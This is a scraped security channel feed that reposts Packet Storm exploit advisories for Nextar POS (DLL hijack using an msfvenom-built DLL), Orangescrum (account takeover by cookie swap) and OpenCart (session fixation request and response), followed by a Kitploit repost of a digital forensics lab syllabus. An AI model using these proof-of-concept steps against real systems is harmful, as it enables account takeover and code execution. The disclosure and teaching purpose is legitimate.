Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Nextar C472 POS DLL Hijacking
https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png
Nextar C472 POS suffers from a dll hijacking vulnerability.
MD5 |
Download
/*
Description:
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.
Exploit Title: Nextar C472 POS DLL Hijacking Exploit (nxmm.dll - mdmdregistration.dll)
Date: 28/11/2021
Author: Yehia Elghaly
Vendor: https://www.nextar.com/
Software: https://download.nextar.com/latest/setup_nex_en.exe
Version: Latest Nextar C472 POS
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
*/
/*
Instructions:
1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Nex POS Hacked - YME" -f dll > nxmm.dll) or compile the code
2. Replace nxmm.dll - mdmdregistration.dll or shcore.dll in Nex directory C:\Nex with your newly dll
3. Launch NexAdmin.exe
4. PoP UP MessageBox!
*/
#include
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Nextar C472 POS DLL Hijacking
https://1.bp.blogspot.com/-HlvbbOwsdTc/WWlvV_wSsQI/AAAAAAAAIOA/psrlTyexNtUDdre2JEY7YvqsGP1V8LJKQCLcBGAs/s1600/h47.png
Nextar C472 POS suffers from a dll hijacking vulnerability.
MD5 |
042ade5bb6a561b509ee91f0791e6f7aDownload
/*
Description:
A vulnerability exists in windows that allows other applications dynamic link libraries
to execute malicious code without the users consent, in the privelage context of the targeted application.
Exploit Title: Nextar C472 POS DLL Hijacking Exploit (nxmm.dll - mdmdregistration.dll)
Date: 28/11/2021
Author: Yehia Elghaly
Vendor: https://www.nextar.com/
Software: https://download.nextar.com/latest/setup_nex_en.exe
Version: Latest Nextar C472 POS
Tested on: Windows 7 Pro x86 - Windows 10 x64
Vulnerable extensions: .htm .html
*/
/*
Instructions:
1. Create dll using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Nex POS Hacked - YME" -f dll > nxmm.dll) or compile the code
2. Replace nxmm.dll - mdmdregistration.dll or shcore.dll in Nex directory C:\Nex with your newly dll
3. Launch NexAdmin.exe
4. PoP UP MessageBox!
*/
#include
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Nextar C472 POS DLL Hijacking
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Polkit Authentication Bypass / Local Privilege Escalation
https://1.bp.blogspot.com/-5_4vnaEHtE4/WWlvOudg9oI/AAAAAAAAIMs/tPLG-GePmxgLMlPyiIuDfO-2MFfOtdhKQCLcBGAs/s1600/h26.png
This whitepaper provides an overview of a Polkit authentication bypass vulnerability that allows for local privilege escalation.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Polkit Authentication Bypass / Local Privilege Escalation
https://1.bp.blogspot.com/-5_4vnaEHtE4/WWlvOudg9oI/AAAAAAAAIMs/tPLG-GePmxgLMlPyiIuDfO-2MFfOtdhKQCLcBGAs/s1600/h26.png
This whitepaper provides an overview of a Polkit authentication bypass vulnerability that allows for local privilege escalation.
MD5 |
67a1833abd27b15afafc5374cc1c064fDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Polkit Authentication Bypass / Local Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Apache HTTP Server 2.4.50 CVE-2021-42013 Exploitation
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
This document aims at explaining some recent vulnerabilities in Apache HTTP Server that leads to attacks like path traversal and remote code execution.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Apache HTTP Server 2.4.50 CVE-2021-42013 Exploitation
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
This document aims at explaining some recent vulnerabilities in Apache HTTP Server that leads to attacks like path traversal and remote code execution.
MD5 |
feda936f15f34e868bc723af3bf3cca5Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apache HTTP Server 2.4.50 CVE-2021-42013 Exploitation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Orangescrum 1.8.0 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Orangescrum 1.8.0 Cross Site Scripting
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Orangescrum 1.8.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
OpenStego Free Steganography Solution 0.8.2
https://1.bp.blogspot.com/-CxGUMLkxSaY/WWlvcQOBNxI/AAAAAAAAIPc/zOKm_r-QYksdaJn5z44Zj2ZlNH1F7PBGQCLcBGAs/s1600/h75.png
OpenStego is a tool implemented in Java for generic steganography, with support for password-based encryption of the data. It supports plugins for various steganographic algorithms (currently, only Least Significant Bit algorithm is supported for images).
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
OpenStego Free Steganography Solution 0.8.2
https://1.bp.blogspot.com/-CxGUMLkxSaY/WWlvcQOBNxI/AAAAAAAAIPc/zOKm_r-QYksdaJn5z44Zj2ZlNH1F7PBGQCLcBGAs/s1600/h75.png
OpenStego is a tool implemented in Java for generic steganography, with support for password-based encryption of the data. It supports plugins for various steganographic algorithms (currently, only Least Significant Bit algorithm is supported for images).
MD5 |
6b8c390a635620be33dc406cb60aee9aDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
OpenStego Free Steganography Solution 0.8.2
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Orangescrum 1.8.0 Privilege Escalation
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png
Orangescrum version 1.8.0 suffers from a privilege escalation vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Orangescrum 1.8.0 Privilege Escalation
https://1.bp.blogspot.com/-LuDwp3Oo6oc/WWlvICvnykI/AAAAAAAAILo/OetpmDNBdyImnh7DlH6SrwI0NyzSCKSJACLcBGAs/s1600/h142.png
Orangescrum version 1.8.0 suffers from a privilege escalation vulnerability.
MD5 |
139af6c37d76cbc5a15aff2c6bc0fd81Download
# Exploit Title: orangescrum 1.8.0 - Privilege escalation (Authenticated)
# Date: 07/10/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### Privilege escalation
# The user must be assigned to the project with the account he wants to take over
# The vulnerabilities in the application allow for:
* Taking over any account with which the project is assigned
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example
1. Go to the dashboard
2. Go to the page source view
3. Find in source "var PUSERS"
4. Copy "uniq_id" victim
5. Change cookie "USER_UNIQ" to "USER_UNIQ" victim from page source
6. After refreshing the page, you are logged in to the victim's account
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Orangescrum 1.8.0 Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Opencart 3.0.3.8 Session Injection
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Opencart version 3.0.3.8 suffers from a session injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Opencart 3.0.3.8 Session Injection
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Opencart version 3.0.3.8 suffers from a session injection vulnerability.
MD5 |
2eab9852aa23a0a89593c8ca9ff38efbDownload
# Exploit Title: opencart 3.0.3.8 - Sessjion Injection
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/
# Version: 3.0.3.8
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
### Sessjion Fixation / injection
Session cookie "OCSESSID" is inproperly processed
Attacker can set any value cookie and server set this value
Becouse of that sesssion injection and session fixation vulnerability
-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------
## Example
Modify cookie "OCSESSID" value:
-----------------------------------------------------------------------------------------------------------------------
Req
-----------------------------------------------------------------------------------------------------------------------
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://127.0.0.1/opencart-3.0.3.8/
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------------------------------------------------------------------------------------------------
Server set atttacker value:
Res:
-----------------------------------------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 28 Nov 2021 15:16:06 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: PHP/8.0.11
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18944
[...]
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Opencart 3.0.3.8 Session Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty
http://www.kitploit.com/2021/11/digital-forensics-lab-free-hands-on.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/11/digital-forensics-lab-free-hands-on.html
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
Table of Contents (updating) Basic Computer Skills for Digital Forensics Number Systems (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx) PC Introduction (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/1_PC_Introduction.pptx) Windows (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/2_Win_command_line_tutorial.pptx)Command Line (https://www.kitploit.com/search/label/Command%20Line) Tutorial Linux Command Line Tutorial (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/3_Linux_command_line_tutorial.pptx) Advanced Linux Command Line Tutorial (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/4_Advanced_linux_command_line.pptx) Computer and Digital Forensics (updated on Oct. 2021) Introduction to Digital Forensics (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/5_Introduction_to_digital_forensics.pptx) Sleuth Kit Tutorial (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/6_Sleuth_Kit_Tutorial.pptx) USB Image Acquisition (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/7_USB_Image_Acquisition.pptx) Evidence Search Techniques (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/8_Evidence_search_techniques.pptx) Data Carving (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/9_Data_Carving.pptx) Steganography (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/10_Steganography.pptx) Forensic Report Template (https://github.com/frankwxu/digital-forensics-lab/blob/main/Basic_Computer_Skills_for_Forensics/Forensic_Report_Template.pdf) Computer Forensics Case Study Investigating P2P Data Leakage (https://github.com/frankwxu/digital-forensics-lab#Investigating-P2P-Data-Leakage) (added on June 2021) Investigating NIST Data Leakage (https://github.com/frankwxu/digital-forensics-lab#Investigating-NIST-Data-Leakage) Investigating Illegal Possession of Images (https://github.com/frankwxu/digital-forensics-lab#Investigating-Illegal-Possession-of-Images) Investigating Email Harassment (https://github.com/frankwxu/digital-forensics-lab#Investigating-Email-Harassment) Investigating Illegal File Transferring (Memory Forensics) (https://github.com/frankwxu/digital-forensics-lab#Investigating-illegal-File-Transferring) Investigating Hacking Case (https://github.com/frankwxu/digital-forensics-lab#Investigating-Hacking-Case) Mobile Forensics Case Study Investigating Android 10 (https://github.com/frankwxu/digital-forensics-lab#Investigating-Android-10) (added on Oct/24/2021) iOS 13 (to be released...) Forensic Intelligence Repository Email forensics (https://github.com/frankwxu/digital-forensics-lab/blob/main/STIX_for_digital_forensics/Email_Harassment) Illegal Possession of Images (https://github.com/frankwxu/digital-forensics-lab/blob/main/STIX_for_digital_forensics/Illegal_Possession_Images) Tool Installation Tools Used (https://github.com/frankwxu/digital-forensics-lab#Tools-Used) Installation PPTs (https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/Kali_Installation_2020.pptx) Installation Scripts (see commands as follows) # The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon.
wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh
chmod +x tool-install-zsh.sh
./tool-install-zsh.sh
___________________________
@hacking_Attack
@Hacking_Video
wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh
chmod +x tool-install-zsh.sh
./tool-install-zsh.sh
___________________________
@hacking_Attack
@Hacking_Video
GitHub
digital-forensics-lab/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx at main · frankwxu/digital-forensics-lab
Free hands-on digital forensics labs for students and faculty - frankwxu/digital-forensics-lab
Investigating P2P Data Leakage ============== The P2P data leakage case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case) is to help students to apply various forensic techniques to investigate intellectual property theft involving P2P. The study include A large and complex case involving a uTorrent client. The case is similar to NIST data leakage lab. However, it provides a clearer and more detailed timeline. Solid evidence with explanations. Each evidence that is associated with each activity is explained along with the timeline. We suggest using this before study NIST data leakage case study. 10 hands-on labs/topics in digital forensics Topics Covered Labs Topics Covered Size of PPTs Lab 0 Lab Environment Setting Up (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID00_Lab_Setup.pptx) 4M Lab 1 Disk Image and Partitions (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID01_Disk_Image_and_Partitions.pptx) 5M Lab 2 Windows Registry and File Directory (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID02_Registry_and_File_Directory.pptx) 15M Lab 3 MFT Timeline (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID03_MFT_Timeline.pptx) 6M Lab 4 USN Journal Timeline (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID03_MFT_Timeline.pptx) 3M Lab 5 uTorrent Log File (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID05_uTorrent_Log_File.pptx) 9M Lab 6 File Signature (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID06_File_Signature.pptx) 8M Lab 7 Emails (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID07_Emails.pptx) 9M Lab 8 Web History (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID08_Web_History.pptx) 11M Lab 9 Website Analysis (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/ID09_Website_Analysis.pptx) 2M Lab 10 Timeline (Summary) (https://github.com/frankwxu/digital-forensics-lab/blob/main/P2P_Leakage/Presentation/Questions.docx) 13K
Investigating NIST Data Leakage ============== The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case) is to investigate an image involving intellectual property theft. The study include A large and complex case study created by NIST. You can access the Senario, DD/Encase images (https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html). You can also find the solutions (https://www.cfreds.nist.gov/data_leakage_case/leakage-answers.pdf) on their website. 14 hands-on labs/topics in digital forensics Topics Covered Labs Topics Covered Size of PPTs Lab 0 Environment Setting Up (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_00_Env_Setting.pptx) 2M Lab 1 Windows Registry (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_01_Registry.pptx) 3M Lab 2 Windows Event and XML (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx) 3M Lab 3 Web History and SQL (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx) 3M Lab 4 Email Investigation (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx) 3M Lab 5 File Change History and USN Journal (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_05_USNJournaling.pptx) 2M Lab 6
___________________________
@hacking_Attack
@Hacking_Video
Investigating NIST Data Leakage ============== The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Data_Leakage_Case) is to investigate an image involving intellectual property theft. The study include A large and complex case study created by NIST. You can access the Senario, DD/Encase images (https://www.cfreds.nist.gov/data_leakage_case/data-leakage-case.html). You can also find the solutions (https://www.cfreds.nist.gov/data_leakage_case/leakage-answers.pdf) on their website. 14 hands-on labs/topics in digital forensics Topics Covered Labs Topics Covered Size of PPTs Lab 0 Environment Setting Up (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_00_Env_Setting.pptx) 2M Lab 1 Windows Registry (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_01_Registry.pptx) 3M Lab 2 Windows Event and XML (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx) 3M Lab 3 Web History and SQL (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_02._WinEvt_XML.pptx) 3M Lab 4 Email Investigation (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_04_Email_USB.pptx) 3M Lab 5 File Change History and USN Journal (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_05_USNJournaling.pptx) 2M Lab 6
___________________________
@hacking_Attack
@Hacking_Video
GitHub
digital-forensics-lab/NIST_Data_Leakage_Case at main · frankwxu/digital-forensics-lab
Free hands-on digital forensics labs for students and faculty - frankwxu/digital-forensics-lab
Network Evidence and shellbag (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_06_Network_Shellbag_Jumplist.pptx) 2M Lab 7 Network Drive and Cloud (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_07_NetworkDrive_Cloud.pptx) 5M Lab 8 Master File Table ($MFT) and Log File ($logFile) Analysis (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_08_CD_%24MFT.pptx) 13M Lab 9 Windows Search History (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_08_CD_%24MFT.pptx) 4M Lab 10 Windows Volume Shadow Copy Analysis (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_10_Vol_Shadow_Copy.pptx) 6M Lab 11 Recycle Bin and Anti-Forensics (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_11_RecycleBin_AntiForensics.pptx) 3M Lab 12 Data Carving (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_12_CD-R_Data_Carving.pptx) 3M Lab 13 Crack Windows Passwords (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Data_Leakage_Case/NIST_Data_Leakage_13_Crack_Win10_Login_Password.pptx) 2M
Investigating Illegal Possession of Images ===================== The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_Possession_Images) is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the USB DD image (https://www.cfreds.nist.gov/dfrws/Rhino_Hunt.html). A copy of the image is also available in the repository. Topics Covered Labs Topics Covered Size of PPTs Lab 0 HTTP Analysis using Wireshark (text) (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx) 3M Lab 1 HTTP Analysis using Wireshark (image) (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx) 6M Lab 2 Rhion Possession Investigation 1: File recovering (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx) 9M Lab 3 Rhion Possession Investigation 2: Steganography (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx) 4M Lab 4 Rhion Possession Investigation 3: Extract Evidence from FTP Traffic (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx) 3M Lab 5 Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx) 5M Investigating Email Harassment ========= The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/Email_Harassment) is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the senario description (https://digitalcorpora.org/corpora/scenarios/nitroba-university-harassment-scenario) and network traffic (http://downloads.digitalcorpora.org/corpora/scenarios/2008-nitroba/nitroba.pcap) from their website. The repository only provides lab instructions. Topics Covered Labs Topics Covered Size of PPTs Lab 0 Investigating Harassment Email using Wireshark (https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/0_Investigate_Harassment_Email_Wireshark.pptx) 3M Lab 1 t-shark Forensic Introduction
___________________________
@hacking_Attack
@Hacking_Video
Investigating Illegal Possession of Images ===================== The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_Possession_Images) is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the USB DD image (https://www.cfreds.nist.gov/dfrws/Rhino_Hunt.html). A copy of the image is also available in the repository. Topics Covered Labs Topics Covered Size of PPTs Lab 0 HTTP Analysis using Wireshark (text) (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx) 3M Lab 1 HTTP Analysis using Wireshark (image) (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx) 6M Lab 2 Rhion Possession Investigation 1: File recovering (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx) 9M Lab 3 Rhion Possession Investigation 2: Steganography (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx) 4M Lab 4 Rhion Possession Investigation 3: Extract Evidence from FTP Traffic (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx) 3M Lab 5 Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx) 5M Investigating Email Harassment ========= The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/Email_Harassment) is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the senario description (https://digitalcorpora.org/corpora/scenarios/nitroba-university-harassment-scenario) and network traffic (http://downloads.digitalcorpora.org/corpora/scenarios/2008-nitroba/nitroba.pcap) from their website. The repository only provides lab instructions. Topics Covered Labs Topics Covered Size of PPTs Lab 0 Investigating Harassment Email using Wireshark (https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/0_Investigate_Harassment_Email_Wireshark.pptx) 3M Lab 1 t-shark Forensic Introduction
___________________________
@hacking_Attack
@Hacking_Video
GitHub
digital-forensics-lab/NIST_Data_Leakage_06_Network_Shellbag_Jumplist.pptx at main · frankwxu/digital-forensics-lab
Free hands-on digital forensics labs for students and faculty - digital-forensics-lab/NIST_Data_Leakage_06_Network_Shellbag_Jumplist.pptx at main · frankwxu/digital-forensics-lab
(https://github.com/frankwxu/digital-forensics-lab/blob/main/Email_Harassment/1_tshark_forensics_Introduction.pptx) 2M Lab 2 Investigating Harassment Email using t-shark (https://github.com/frankwxu/digital-forensics-lab/blob/main/2_Investigate_Harassment_Email_TShark.pptx) 2M Investigating Illegal File Transferring (Memory Forensics ) ========= The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/Illegal_File_Transferring_Memory_Forensics) is to investigate computer memory for reconstructing a timeline of illegal data transferring. The case includes a scenario of transfer sensitive files from a server to a USB. Topics Covered Labs Topics Covered Size of PPTs Lab 0 Memory Forensics (https://github.com/frankwxu/digital-forensics-lab/blob/main/Illegal_File_Transferring_Memory_Forensics) 11M part 1 Understand the Suspect and Accounts part 2 Understand the Suspect’s PC part 3 Network Forensics part 4 Investigate Command History part 5 Investigate Suspect’s USB part 6 Investigate Internet Explorer (https://www.kitploit.com/search/label/Internet%20Explorer) History part 7 Investigate File Explorer History part 8 Timeline Analysis Investigating Hacking Case ========= The case study (https://github.com/frankwxu/digital-forensics-lab/tree/main/NIST_Hacking_Case), including a disk image provided by NIST (https://www.cfreds.nist.gov/Hacking_Case.html) is to investigate a hacker who intercepts internet traffic within range of Wireless Access Points. Topics Covered Labs Topics Covered Size of PPTs Lab 0 Hacking Case (https://github.com/frankwxu/digital-forensics-lab/blob/main/NIST_Hacking_Case/NIST_Hacking_Case.pptx) 8M Investigating Android 10 The image is created by Joshua Hickman and hosted by digitalcorpora (https://digitalcorpora.org/corpora/cell-phones/android-10). ========= Labs Topics Covered Size of PPTs Lab 0 Intro Pixel 3 (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/0_Intro_Pixel3_Andriod10.pptx) 3M Lab 1 Pixel 3 Image (https://github.com/frankwxu/digital-forensics-lab/blob/main/Andriod10/1_Pixel3_Image.pptx) 2M Lab 2 Pixel 3 Device 